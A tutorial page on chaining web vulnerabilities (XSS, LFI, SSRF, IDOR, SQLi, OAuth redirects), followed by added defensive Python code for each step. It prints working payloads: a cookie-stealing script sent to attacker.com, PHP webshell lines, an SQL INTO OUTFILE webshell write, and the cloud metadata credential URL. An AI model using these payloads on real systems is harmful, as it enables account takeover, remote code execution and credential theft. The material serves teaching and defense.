Chaining Vulnerabilities

Chaining vulnerabilities means combining multiple independent flaws into a single attack path that achieves a much higher impact than any vulnerability alone. Most real-world compromises succeed not because of one “big” bug, but because an attacker links small, moderate, or partial vulnerabilities into a full exploitation chain. A vulnerability that seems harmless in isolation becomes critical when connected to another weakness.

Chaining relies on understanding how different components interact: authentication, sessions, APIs, file systems, templates, redirects, WebSockets, and business logic. The attacker strategically uses one flaw to reach the next.

Why Vulnerability Chains Work

Individual weaknesses often have limitations:

  • SQLi may require authentication

  • XSS might be self-only

  • SSRF might reach internal endpoints but not escalate

  • LFI may not lead to RCE immediately

  • IDOR may reveal limited data

  • Race conditions may break logic but not give access

Chaining solves these limitations by linking one flaw to elevate another.

Core Principles of Exploit Chains

An effective chain requires:

  • identifying interaction points

  • understanding trust boundaries

  • recognizing how one flaw unlocks another

  • combining lower-severity bugs to escalate

  • looking for state transitions

  • evaluating flawed assumptions in application logic

Attackers focus on how flaws connect, not just how they work separately.

Common Vulnerability Chain Types

Below are the major real-world, fully practical chaining techniques.


Chain 1: XSS → Session Hijacking → Account Takeover

Step 1: Inject XSS payload

<script>fetch('https://attacker.com?c='+document.cookie)</script>

Step 2: Receive victim’s session cookie
Step 3: Use session cookie to log in as victim
Step 4: Access personal data, payment info, or admin features

If HttpOnly is missing, this chain is trivial.
Even with HttpOnly, XSS can still perform privileged actions.


Chain 2: LFI → Log Poisoning → RCE

Step 1: Poison log with PHP code through User-Agent

User-Agent: <?php system($_GET['cmd']); ?>

Step 2: Use LFI to load the log file

/var/log/apache2/access.log

Step 3: Execute arbitrary commands

?cmd=id

This turns a weak LFI into full RCE.


Chain 3: SSRF → AWS Metadata → Access Keys → Cloud Takeover

Step 1: Trigger SSRF hitting metadata service

http://169.254.169.254/latest/meta-data/iam/security-credentials/role

Step 2: Steal access keys
Step 3: Use stolen keys to:

  • list S3 buckets

  • download sensitive assets

  • deploy EC2 instances

  • modify IAM policies

SSRF alone is moderate severity; chained with metadata access, it becomes catastrophic.
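Added defensive example (not part of the original page): a Python pre-request check for outbound URLs that refuses the metadata address and every other non-public range before the request is made. FAKE_DNS and the example.com host names are constructed so the code runs offline; in a real service replace the resolver with socket.getaddrinfo. Two caveats the comments repeat: the check must cover every address a name resolves to (a rebinding host returns one public and one private answer), and the HTTP client must connect to the address that was checked and must not follow redirects, since a 302 to 169.254.169.254 skips a check that only looks at the first URL. On AWS, requiring IMDSv2 on the instance is the complementary host-side control.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed stand-in for DNS so the example runs offline: hostname -> answers.
FAKE_DNS = {
    "api.example.com": ["203.0.113.10"],
    "internal.example.com": ["10.0.0.5"],
    "rebind.example.com": ["203.0.113.10", "169.254.169.254"],  # one public, one private answer
}

# Ranges an application server should never be tricked into calling on a user's behalf.
# 169.254.0.0/16 covers the cloud metadata address used in Chain 3.
BLOCKED_NETWORKS = [
    ipaddress.ip_network("169.254.0.0/16"),   # link-local, includes 169.254.169.254
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("0.0.0.0/8"),
    ipaddress.ip_network("100.64.0.0/10"),    # CGNAT, used by some cloud metadata services
    ipaddress.ip_network("::1/128"),
    ipaddress.ip_network("fc00::/7"),
    ipaddress.ip_network("fe80::/10"),
    ipaddress.ip_network("::ffff:0:0/96"),    # IPv4-mapped IPv6, e.g. ::ffff:169.254.169.254
]


def _is_blocked(ip) -> bool:
    # Unwrap IPv4-mapped IPv6 so the IPv4 rules apply to it as well.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)


def check_outbound_url(url: str, resolve=lambda host: FAKE_DNS.get(host, [])) -> tuple:
    """Return (allowed, reason). Call this on the final URL, then connect to the checked
    address itself and disable redirect following, or the check can be bypassed."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        # Numeric hosts (dotted quad or bracketed IPv6) never touch DNS; check them directly.
        ips = [ipaddress.ip_address(host)]
    except ValueError:
        # Anything else goes to the resolver. Decimal/hex forms such as 2130706433 are not
        # valid hostnames and resolve to nothing, so they are refused below.
        ips = [ipaddress.ip_address(a) for a in resolve(host)]
    if not ips:
        return False, f"{host} does not resolve"
    # Every answer must be public: one private record is enough to reject a rebinding host.
    for ip in ips:
        if _is_blocked(ip):
            return False, f"{host} resolves to blocked address {ip}"
    return True, "ok"
```

The resolver is passed in as a parameter so the same function can be unit-tested with constructed answers and run in production with a real one.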


Chain 4: IDOR → Password Reset Token Leak → Account Takeover

Step 1: IDOR reveals reset tokens

/reset-tokens?user=3

Step 2: Extract token
Step 3: Submit reset request

POST /reset
token=exposedToken&newPass=123

The chain turns an IDOR into full account compromise.


Chain 5: XSS → CSRF Bypass → Privilege Escalation

If CSRF tokens are stored in the DOM or reflected in JS, XSS can extract them.

Step 1: Execute XSS
Step 2: Extract CSRF token
Step 3: Send privileged request

POST /makeAdmin

Even strong CSRF protection collapses under XSS.


Chain 6: SQLi → File Write → Webshell → RCE

Step 1: SQLi enables writing arbitrary files

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Step 2: Access webshell

/shell.php?cmd=id

Step 3: Full remote code execution


Chain 7: Race Condition → Balance Manipulation → Transfer Abuse

Step 1: Race condition duplicates wallet credits
Step 2: Attacker inflates balance
Step 3: Use inflated balance to:

  • purchase items

  • transfer to attacker account

  • redeem coupons

A minor flaw becomes a financial breach.
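Added example (not part of the original page) showing both sides of Step 1 in Python with SQLite. debit_racy is the read-check-write pattern that duplicates credits under concurrency; debit_atomic folds the balance check into the UPDATE itself so the database's write lock serializes the two requests. The wallet table, the 100-credit starting balance and the threading.Barrier that lines both requests up on the same instant are constructed for the demo.

```python
import os
import sqlite3
import tempfile
import threading


def make_wallet_db(balance: int = 100) -> str:
    # Constructed wallet table in a temporary SQLite file. Each worker opens its own connection,
    # so SQLite's writer lock plays the part of the production database's row/writer lock.
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    conn = sqlite3.connect(path, isolation_level=None)  # autocommit: each statement is atomic
    conn.execute("CREATE TABLE wallets (id INTEGER PRIMARY KEY, balance INTEGER NOT NULL)")
    conn.execute("INSERT INTO wallets VALUES (1, ?)", (balance,))
    conn.close()
    return path


def debit_racy(conn, wallet_id, amount, sync):
    # Vulnerable pattern: read the balance, decide, then write. Between the read and the write a
    # second request reads the same stale balance, so both debits "succeed" and only one is
    # reflected in the stored balance: the credit has been duplicated.
    cur = conn.execute("SELECT balance FROM wallets WHERE id = ?", (wallet_id,))
    (bal,) = cur.fetchone()
    cur.close()
    sync()  # stands in for the scheduling gap that concurrent requests race into
    if bal < amount:
        return False
    conn.execute("UPDATE wallets SET balance = ? WHERE id = ?", (bal - amount, wallet_id))
    return True


def debit_atomic(conn, wallet_id, amount, sync):
    # Hardened pattern: check and write are one statement. The database serializes writers, so
    # the second debit sees the already-reduced balance, fails the predicate and changes no row.
    sync()
    cur = conn.execute(
        "UPDATE wallets SET balance = balance - ? WHERE id = ? AND balance >= ?",
        (amount, wallet_id, amount),
    )
    return cur.rowcount == 1


def run_concurrent(debit, amount=60, workers=2):
    """Run `workers` debits of `amount` against a fresh 100-credit wallet at the same instant.
    Returns (number of debits reported successful, final stored balance)."""
    path = make_wallet_db(100)
    barrier = threading.Barrier(workers)  # every worker reaches the gap before any writes
    results, lock = [], threading.Lock()

    def worker():
        conn = sqlite3.connect(path, isolation_level=None, timeout=5.0)
        ok = debit(conn, 1, amount, barrier.wait)
        conn.close()
        with lock:
            results.append(ok)

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    conn = sqlite3.connect(path)
    (final,) = conn.execute("SELECT balance FROM wallets WHERE id = 1").fetchone()
    conn.close()
    os.remove(path)
    return sum(results), final
```

run_concurrent(debit_racy) reports two successful 60-credit debits against a 100-credit wallet with a final balance of 40, so one debit was effectively free; run_concurrent(debit_atomic) reports one success and the same final balance. On other databases the equivalent controls are the same conditional UPDATE, a row lock (SELECT ... FOR UPDATE inside the transaction) or an optimistic version column checked in the WHERE clause.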


Chain 8: WebSocket Auth Bypass → Admin Actions

Step 1: WebSocket accepts handshake without validating session
Step 2: Attacker joins admin WebSocket channel
Step 3: Send privileged actions

{"action":"deleteUser","id":1}

Lack of WebSocket auth combined with internal features leads to privilege escalation.


Chain 9: Open Redirect → OAuth Token Theft → Account Takeover

Step 1: Redirect parameter:

/redirect?url=https://attacker.com

Step 2: OAuth callback vulnerable:

redirect_uri=trusted.com/redirect?url=

Step 3: Attacker gets OAuth code
Step 4: Exchange for access token
Step 5: Login as victim
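Added defensive example (not part of the original page) for the redirect endpoint in Step 1: a Python validator that only accepts a same-origin absolute path as the redirect target and falls back to "/" for everything else. The parsing tricks it handles are the ones browsers are known to normalise (protocol-relative "//host", extra slashes, backslashes, embedded control characters, schemes without slashes). The OAuth side in Step 2 needs the matching control at the provider: register the full redirect_uri and compare it by exact string match, never by prefix.

```python
from urllib.parse import urlsplit

FALLBACK = "/"


def safe_redirect_target(next_param) -> str:
    """Return next_param if it is an absolute path on this origin, otherwise FALLBACK."""
    if not isinstance(next_param, str) or not next_param:
        return FALLBACK
    # Backslashes: browsers treat "\" as "/" in special schemes, so "/\evil.com" becomes
    # "//evil.com". Control characters: tabs/newlines are stripped by URL parsers, so
    # "/\n/evil.com" also becomes "//evil.com"; CR/LF additionally allow header injection.
    if "\\" in next_param or any(ord(c) < 0x20 or c == "\x7f" for c in next_param):
        return FALLBACK
    # Checked on the raw string: "//evil.com" and "///evil.com" both resolve to another host
    # because browsers collapse any number of leading slashes into an authority.
    if not next_param.startswith("/") or next_param.startswith("//"):
        return FALLBACK
    parts = urlsplit(next_param)
    # Belt and braces: a scheme ("https:evil.com", "javascript:") or authority leaves the site.
    if parts.scheme or parts.netloc:
        return FALLBACK
    return next_param
```

The function returns a path, not a full URL, so the caller builds the Location header from its own configured origin; that keeps the host under the server's control even if the validation is later loosened.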


Chain 10: Deserialization → Arbitrary Object → RCE

Step 1: Find user-controlled unserialize() or pickle/Java deserialization
Step 2: Use gadget chain
Step 3: Execute arbitrary commands or load malicious classes
Step 4: Escalate to full server compromise
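Added defensive example (not part of the original page) for the Python pickle case in Step 1. The control is the one the pickle documentation itself recommends under "Restricting Globals": subclass Unpickler and make find_class refuse every module/name that is not on an allowlist, because that hook is exactly where a gadget chain names the callable it wants executed. CallOnLoad is a constructed, harmless stand-in for a gadget (it only names os.getcwd); SAFE_GLOBALS is an assumed application allowlist. Java's equivalent is an ObjectInputFilter; the stronger fix for all of them is not to deserialize untrusted bytes at all and use JSON with a schema instead.

```python
import io
import os
import pickle

# Assumed allowlist: the only globals this application legitimately needs when loading its own
# data. Nothing from os, subprocess, builtins.eval/exec or similar is reachable through it.
SAFE_GLOBALS = {
    "collections": {"OrderedDict"},
    "datetime": {"date", "datetime"},
}


class RestrictedUnpickler(pickle.Unpickler):
    # find_class is consulted for every GLOBAL / STACK_GLOBAL opcode in the stream. Refusing
    # unknown names here stops a gadget before the callable is even looked up.
    def find_class(self, module, name):
        if name in SAFE_GLOBALS.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class CallOnLoad:
    # Constructed stand-in for a gadget: unpickling an instance calls whatever function the
    # stream names. A harmless os.getcwd is used here; the loader cannot tell a harmless callable
    # from a dangerous one, which is why it must refuse every non-allowlisted name.
    def __reduce__(self):
        return (os.getcwd, ())


def benign_payload() -> bytes:
    # Constructed: plain containers and scalars need no globals at all.
    return pickle.dumps({"user_ids": [1, 2, 3], "page": 2})


def gadget_payload() -> bytes:
    # Constructed: pickle.loads(gadget_payload()) would run os.getcwd(); restricted_loads refuses it.
    return pickle.dumps(CallOnLoad())


def load_untrusted(data: bytes):
    """Return ("ok", obj) when the stream only uses allowlisted globals, else ("refused", reason)."""
    try:
        return ("ok", restricted_loads(data))
    except pickle.UnpicklingError as exc:
        return ("refused", str(exc))
```

Note what the allowlist does not do: it cannot make a class on the list safe if that class does dangerous things in its own __setstate__ or __reduce__, so the list should contain plain data types only.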


Chain 11: Weak Password Policy → Credential Stuffing → Insecure Session → Admin Panel Access

Step 1: Attackers try breached password lists
Step 2: Weak password accepted
Step 3: Session tokens are predictable or reused
Step 4: Admin access achieved

Weak configurations combine to form a critical breach.


Chain 12: CORS Misconfiguration → API Token Leak → Privilege Abuse

Step 1: CORS allows * or attacker domain
Step 2: Browser sends session cookies via withCredentials=true
Step 3: Attacker JS reads API responses
Step 4: Extract tokens and act as victim

CORS alone is not “critical,” but when chained with authenticated APIs, it becomes severe.


Chain 13: API Mass Assignment → Privilege Escalation → IDOR → Full User Data Access

Step 1: Mass assignment sets admin role

{"role":"admin"}

Step 2: Access admin-only endpoints
Step 3: Exploit IDOR to access user records
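Added defensive example (not part of the original page) covering Steps 1 and 3 in Python. apply_update copies only allowlisted fields from the request body onto the user object, so a submitted "role" or "id" is dropped and reported rather than assigned; can_access_user is the object-level check that the IDOR step is missing, evaluated on every record endpoint regardless of the role the caller holds. The User model and the two allowlists are assumed, not from any particular framework.

```python
from dataclasses import dataclass

# Assumed allowlists. Everything not listed is server-controlled; "role" and "id" are
# deliberately absent from the user list, which is what defeats {"role":"admin"}.
USER_WRITABLE = frozenset({"display_name", "email", "timezone"})
ADMIN_WRITABLE = USER_WRITABLE | {"role", "is_active"}


@dataclass
class User:
    id: int
    email: str
    display_name: str = ""
    timezone: str = "UTC"
    role: str = "user"
    is_active: bool = True


def apply_update(user: User, payload: dict, actor_role: str) -> list:
    """Copy allowlisted fields from payload onto user. Returns the rejected keys so the caller
    can log them: a non-admin sending "role" is a strong mass-assignment probe signal."""
    allowed = ADMIN_WRITABLE if actor_role == "admin" else USER_WRITABLE
    rejected = sorted(k for k in payload if k not in allowed)
    for key, value in payload.items():
        if key in allowed:
            setattr(user, key, value)
    return rejected


def can_access_user(actor: User, target_user_id: int) -> bool:
    # Object-level authorization for the IDOR step: admins may read any record, everyone else
    # only their own. The check uses the server-side role, never anything from the request.
    return actor.role == "admin" or actor.id == target_user_id
```

Binding request bodies straight onto ORM models (or using a framework's "update from dict" helper without a field list) is the root cause of Step 1; an explicit allowlist per role is the fix in any language.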


Chain 14: Path Traversal → Source Code Read → Secret Keys Leak → JWT Forgery

Step 1: Read config file:

../../../../config.js

Step 2: Extract JWT secret
Step 3: Forge new JWT:

{"role":"admin"}

Step 4: Login as admin
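Added defensive example (not part of the original page) for the file-read step shared by Chain 2 (LFI of /var/log/apache2/access.log) and Chain 14 (../../../../config.js): a Python resolver that joins the user-supplied name under the allowed directory, resolves ".." and symlinks with realpath, and refuses anything whose real path leaves that directory. The directory layout is constructed by make_demo_tree; a POSIX host is assumed (os.path.commonpath raises on mixed Windows drives).

```python
import os
import tempfile
from typing import Optional


def resolve_under(base_dir: str, user_path: str) -> Optional[str]:
    """Resolve user_path inside base_dir. Returns the real absolute path, or None if the
    resolved path (after "..", symlinks and absolute-path prefixes) leaves base_dir."""
    if "\x00" in user_path:  # NUL truncates the path in C-level APIs; never pass it on
        return None
    base = os.path.realpath(base_dir)
    # A leading "/" would make os.path.join discard base_dir, so treat every input as relative.
    candidate = os.path.realpath(os.path.join(base, user_path.lstrip("/\\")))
    # commonpath, not startswith: "/srv/app/templates-private" starts with "/srv/app/templates".
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def serve_file(base_dir: str, user_path: str) -> Optional[str]:
    """What an include/template handler should do: resolve, refuse escapes, then read."""
    path = resolve_under(base_dir, user_path)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, "r", encoding="utf-8") as fh:
        return fh.read()


def make_demo_tree() -> str:
    # Constructed layout: <tmp>/app/templates/home.html with <tmp>/app/config.js one level up,
    # mirroring the traversal target in Chain 14. Returns the templates directory.
    root = tempfile.mkdtemp()
    templates = os.path.join(root, "app", "templates")
    os.makedirs(templates)
    with open(os.path.join(templates, "home.html"), "w", encoding="utf-8") as fh:
        fh.write("<h1>home</h1>")
    with open(os.path.join(root, "app", "config.js"), "w", encoding="utf-8") as fh:
        fh.write("module.exports = { jwtSecret: 'constructed-placeholder' };")
    return templates
```

With this in place the log-poisoning chain also breaks at Step 2: "/var/log/apache2/access.log" is re-rooted under the templates directory, where no such file exists, so the poisoned log is never parsed. Keeping secrets out of files under the web root, and rotating a JWT secret the moment a read is suspected, are the complementary controls for Chain 14.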


Chain 15: Weak Rate Limit → OTP Brute Force → Account Takeover

Step 1: OTP endpoint lacks rate-limiting
Step 2: Brute-force:

000000 → 999999

Step 3: Login as victim
Step 4: Change password

Alone, a rate-limit bypass is medium severity; chained, it is critical.
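Added defensive example (not part of the original page) for Step 1: a Python OTP verifier with a per-user attempt budget, an expiring single-use code and a constant-time comparison. The limits (5 guesses per 10 minutes, 5-minute code lifetime) are assumptions; the clock is injectable so the lockout can be tested without waiting. A per-IP or global limiter on the endpoint belongs alongside it, since this counter alone does not slow an attacker who spreads guesses across many accounts.

```python
import hmac
import secrets
import time

MAX_ATTEMPTS = 5          # assumed: guesses allowed per user per window
WINDOW_SECONDS = 600      # assumed
CODE_TTL_SECONDS = 300    # assumed


class OtpVerifier:
    """Per-user attempt counter plus single-use, expiring codes.

    With a 6-digit code and 5 guesses per window, the chance of a hit per window is
    5 / 1,000,000 instead of certainty after at most 10**6 unthrottled requests."""

    def __init__(self, clock=time.time):
        self.clock = clock        # injectable for deterministic tests
        self.codes = {}           # user -> (code, expires_at)
        self.attempts = {}        # user -> (count, window_started_at)

    def issue(self, user: str) -> str:
        # Issuing a new code deliberately does not reset the attempt counter, so
        # "request a fresh code" cannot be used to reset the lockout.
        code = f"{secrets.randbelow(10**6):06d}"
        self.codes[user] = (code, self.clock() + CODE_TTL_SECONDS)
        return code

    def verify(self, user: str, submitted: str) -> str:
        now = self.clock()
        count, started = self.attempts.get(user, (0, now))
        if now - started >= WINDOW_SECONDS:
            count, started = 0, now
        if count >= MAX_ATTEMPTS:
            return "locked"       # checked before comparing: a correct guess past the limit is refused
        self.attempts[user] = (count + 1, started)
        code, expires_at = self.codes.get(user, (None, 0.0))
        if code is None or now > expires_at:
            return "expired"
        if not hmac.compare_digest(code.encode(), submitted.encode()):
            return "wrong"
        del self.codes[user]      # single use: the same code cannot be replayed after login
        return "ok"
```

Returning a plain status string keeps the response identical for "wrong" and "locked" timing-wise apart from the comparison itself; the caller should map all non-"ok" results to the same generic error for the client and log the real reason server-side.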


Practical Strategy for Identifying Chains

Step 1: Map all discovered vulnerabilities

Document each flaw.

Step 2: Identify connecting points

Look for:

  • shared parameters

  • tokens

  • session flows

  • API interactions

  • database dependencies

  • trust boundaries

Step 3: Check for escalations

Use a small flaw to break a bigger mechanism.

Step 4: Attempt multi-step attacks

Simulate how one weakness influences the next.

Step 5: Combine access + misconfigurations

This yields the highest-impact chains.
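Added example (not part of the original page) that turns Steps 1 to 5 into something a triage team can run. Each finding is modelled by the capabilities an attacker needs to exploit it and the capabilities it grants; a fixed-point search then answers "what can be reached from an unauthenticated HTTP request" and chain_breakers answers the defender's question, which single fix removes every path to a given outcome. The FINDINGS list is constructed to mirror Chains 3 and 4 above, with the severities each flaw would get on its own.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    name: str
    severity: str        # the rating the flaw earns in isolation
    requires: frozenset  # capabilities the attacker must already hold
    provides: frozenset  # capabilities gained once this flaw is exploited


def F(name, severity, requires, provides):
    return Finding(name, severity, frozenset(requires), frozenset(provides))


# Constructed inventory (Step 1), written as connecting points (Step 2).
FINDINGS = [
    F("ssrf_in_pdf_export", "medium", ["unauth_http"], ["internal_http"]),
    F("debug_endpoint_exposed", "low", ["unauth_http"], ["internal_http"]),
    F("imdsv1_reachable", "low", ["internal_http"], ["cloud_keys"]),
    F("overprivileged_instance_role", "low", ["cloud_keys"], ["s3_read", "iam_write"]),
    F("idor_reset_tokens", "medium", ["unauth_http"], ["account_takeover"]),
]


def exploit_fixpoint(findings, start):
    """Steps 3-4: fire every finding whose preconditions hold until nothing new is gained.
    Returns (all capabilities reached, findings fired in order)."""
    caps, fired = set(start), []
    progress = True
    while progress:
        progress = False
        for f in findings:
            if f not in fired and f.requires <= caps and not f.provides <= caps:
                caps |= f.provides
                fired.append(f)
                progress = True
    return caps, fired


def chain_to(findings, start, goal):
    """Backward-slice the fired list down to the findings that actually lead to goal."""
    caps, fired = exploit_fixpoint(findings, start)
    if goal not in caps:
        return None
    needed, chain = {goal}, []
    for f in reversed(fired):
        if f.provides & needed:
            chain.append(f.name)
            needed = (needed - f.provides) | (f.requires - set(start))
    return list(reversed(chain))


def chain_summary(findings, start, goal) -> str:
    chain = chain_to(findings, start, goal)
    if chain is None:
        return f"{goal}: not reachable"
    severity = {f.name: f.severity for f in findings}
    return " -> ".join(f"{n}({severity[n]})" for n in chain) + f" => {goal}"


def chain_breakers(findings, start, goal):
    """Findings whose removal alone makes goal unreachable: the fixes to prioritise."""
    return [f.name for f in findings
            if chain_to([g for g in findings if g is not f], start, goal) is None]
```

On the constructed data the summary reads ssrf_in_pdf_export(medium) -> imdsv1_reachable(low) -> overprivileged_instance_role(low) => iam_write, which is the page's thesis in one line. chain_breakers shows that fixing the SSRF does not break this chain, because the exposed debug endpoint also provides internal_http; the two "low" findings are the pivot every path goes through, so they are the ones to fix first.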


Advanced Chaining Techniques

Lateral Movement Chaining

  • SSRF → internal admin panel

  • admin panel → unsafe file upload

  • file upload → webshell

  • webshell → root access

Multi-Parser Chaining

Exploit differences in:

  • WAF

  • backend

  • framework

  • proxy

Multi-Context Payload Chaining

Payload encoded once → decoded twice → executed.


Real-World Exploit Chain Patterns

  • Authentication bypass → Privilege escalation → Data extraction

  • Open redirect → OAuth code leakage → Session takeover

  • Blind SQLi → File read → Key extraction → RCE

  • XSS → Cookie grab → CSRF token steal → Account takeover

  • Race condition → Financial manipulation → Balance transfer abuse

  • SSRF → Redis access → Write cron job → RCE


Intel Dump

  • Vulnerability chaining turns minor flaws into high-impact attacks.

  • Chains combine authentication flaws, injections, logic bugs, misconfigurations, and transport-layer weaknesses.

  • Key chains include XSS → session theft, LFI → log poisoning, SSRF → metadata access, IDOR → token leak, SQLi → file write, and many others.

  • Chains exploit assumptions across components, taking advantage of how one flaw unlocks another.

  • Real-world exploitation rarely uses one vulnerability; chaining multiplies impact into full system compromise.
